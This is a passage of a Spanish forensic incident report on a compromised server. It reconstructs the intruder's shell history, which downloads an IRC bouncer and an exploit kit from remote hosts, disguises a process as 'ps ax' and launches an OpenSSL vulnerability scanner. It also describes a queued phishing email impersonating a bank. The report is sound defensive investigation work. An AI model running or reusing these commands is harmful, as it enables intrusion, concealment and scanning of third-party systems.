INFORME TÉCNICO – ANÁLISIS FORENSE

More documents

Recommendations

Info

wget www.zetu.as.ro/psyz.tar.gztar xzvf psyz.tar.gzrm -rf psyz.tar.gzmv psybnc localcd localrm -rf psybnc.conf*wget www.zetu.as.ro/psybnc/psybnc.confmv psybnc "ps ax"export PATH=".""ps ax"cd var/tmpdirrm -rf woot.tgzdirwget www.zetu.as.ro/psybnc.tgztar xvfz psybnc.tgzcd psybnc./psybncwexitwps auxcd /var/tmplsdirwget http://www.plus.factory.home.ro/selena.tgztar xvfz selena.tgzcd selena./assl 217.172Lo primero que hace es descargar w00t.tgz que son una serie deutilidades. Después hace un escaneo de la red de la clase B 200.207buscando máquinas con el puerto de netbios abierto(139).Luego descargó e instaló el psyz, que es el psybnc con el nombrecambiado (un bouncer para conectar al IRC). Mas información enhttp://www.psybnc.info/Descargo un fichero llamado selena.tgz donde tiene una serie deexploits y utilidades, entre ellas un script llamado assl que lo utilizóbuscando más ordenadores con assl(escaner que buscar servidores apachecon OpenSSL vulnerable) en la red 217.172.
El intruso dejó en este caso mucha “basura” por los directorios.Continuando con la lista de lo que pasó el día 29 tenemos ficherosque hacen referencia al webalizer (aplicación para analizar los logs delservidor web), pero no observo nada que llame la atención. Sin embargo,los siguientes ficheros son del bouncer instalado pero uno si que esinteresante el var/tmp/psybnc/motd/USER1.MOTD nos indica la primeraconexión que hizo al irc por medio de esta máquina(29-01-2005 15:49).Retrocediendo en el árbol de directorio observamos que hay unfichero llamado USER1.log:$ sudo cat USER1.LOG~Mon Jan 31 03:12:48 :(JustPain!~Just@JustPain.users.undernet.org)wa mui baga aazeii aia ji la mine ..No se lo que pone, pero... quizá sea rumano(nos acercaría a ladirección de mail que teníamos anteriormente).De esta manera hemos revisado manualmente todos los ficheros modificadosel día 29.CREANDO LÍNEA DE TIEMPO IIITal como hicimos al principio sacamos un listado de todos losficheros modificados el día 29. Ahora haremos lo mismo pero con los díasposteriores hasta que el 31 (último momento en que la máquina estuvoactiva).Intentando seleccionar los ficheros más relevantes del día 30, veoque el primer fichero del listado(véase Apéndice I) es el cp, no le veonada aparentemente raro. Pero,¿qué pasa con el virus? El virus ha podidoestar infectando ficheros en este tiempo.Barajando esta posibilidad iré a ficheros en concreto que no puedanhaber sido descargados por el intruso, al final en el Apéndice IIencontrarás un listado de ficheros afectados por el virus y un script quelocalicé por internet que busca ficheros afectados por este virus.Como a simple vista no hay nada “interesante”, generamos la listade los ficheros modificados el día 31. Hay muchos ficheros que ya losvimos anteriormente.Advierto dos ficheros que pertenecen a la cola de correo que elusuario root ha enviado, pero que todavía no han salido(var/spool/mqueue). Entre los dos ficheros forman un mail enviado de laWAMU (Washington Mutual) para que confirme su cuenta “on line” bancaria.Al mirar el adjunto vemos que hay un link a una página segura,supuestamente del servidor de wamu, pero no, el link te lleva a200.180.33.94 (que no tiene nada que ver con la Wamu). Esta IP pertenecea la LACNIC(www.lacnic.net) allí haciendo una consulta vemos que la ippertenece a un dominio brasileño.Fraudes por correo electrónico? robo de contraseñas? el intruso deeste sistema apunta lejos ;-)
Page 1 and 2: INFORME TÉCNICO-ANÁLISIS FORENSEH
Page 3 and 4: INTRODUCCIÓNA lo largo de este inf
Page 6 and 7: ello. También cabe la posibilidad
Page 8: m -rf sc*cd /var/logdirmkdir daemon
Page 11: PROFUNDIZANDO EN EL QUÉ HIZOCon el
Page 15 and 16: APENDICE IListado de ficheros modif
Page 17 and 18: -rwxr-xr-x 1 505 505 46379 2005-01-
Page 19 and 20: Checking `passwd'... not infectedCh

INFORME TÉCNICO – ANÁLISIS FORENSE

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?